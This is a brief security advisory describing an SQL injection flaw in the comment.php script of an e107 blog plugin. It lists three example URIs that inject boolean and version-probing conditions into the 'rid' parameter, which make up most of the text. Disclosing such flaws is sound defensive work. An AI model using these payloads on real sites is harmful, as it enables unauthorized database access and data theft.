e107 BLOG Engine 'comment.php' SQL Injection Vulnerability

e107 BLOG Engine 'comment.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.ecample.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and 1=1--
http://www.example.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and 1=2--
http://www.example.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and substring(@@version,1,1)=4